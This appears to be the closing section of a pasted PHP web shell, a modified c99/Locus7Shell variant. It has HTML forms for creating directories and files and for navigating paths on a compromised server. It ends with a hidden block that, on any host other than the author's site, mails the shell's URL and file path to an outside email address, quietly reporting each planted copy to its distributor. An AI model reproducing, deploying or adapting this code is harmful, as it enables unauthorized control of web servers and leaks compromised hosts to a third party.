  3677. <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Make Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>Make File<form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
  3678. <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Go Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>Go File<form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
  3679. <br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ x2300 Locus7Shell v. <?php echo $shver; ?><a href="http://www.google.com/"> <u><b>Modded by</b></u></a> | #!<font size="5" color="white"> <b> <font size="5" color="red">X</font>e[<font size="5" color="red">RR</font>]or<font size="5" color="red">0</font>X</b></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
  3680. <?
  3681. // sh3ll.us & no-shell.net
  3682. // Net-Thug@msn.com
  3683. // Net-Thug@msn.com
  3684. $site = "www.Sh3ll.Us";
  3685. if(!ereg($site, $_SERVER['SERVER_NAME']))
  3686. {
  3687. $to = "net-thug@msn.com";
  3688. $subject = "NeW_Sh3LL";
  3689. $header = "from: Net-Thug <GeNeRaL-111@Andalus.com>";
  3690. $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
  3691. $message .= "Path : " . __file__;
  3692. $sentmail = @mail($to, $subject, $message, $header);
  3693.  
  3694. echo "";
  3695. exit;
  3696. }
  3697. ?>
  3698. </body></html><?php chdir($lastdir); c99shexit(); ?>
RAW Paste Data Copied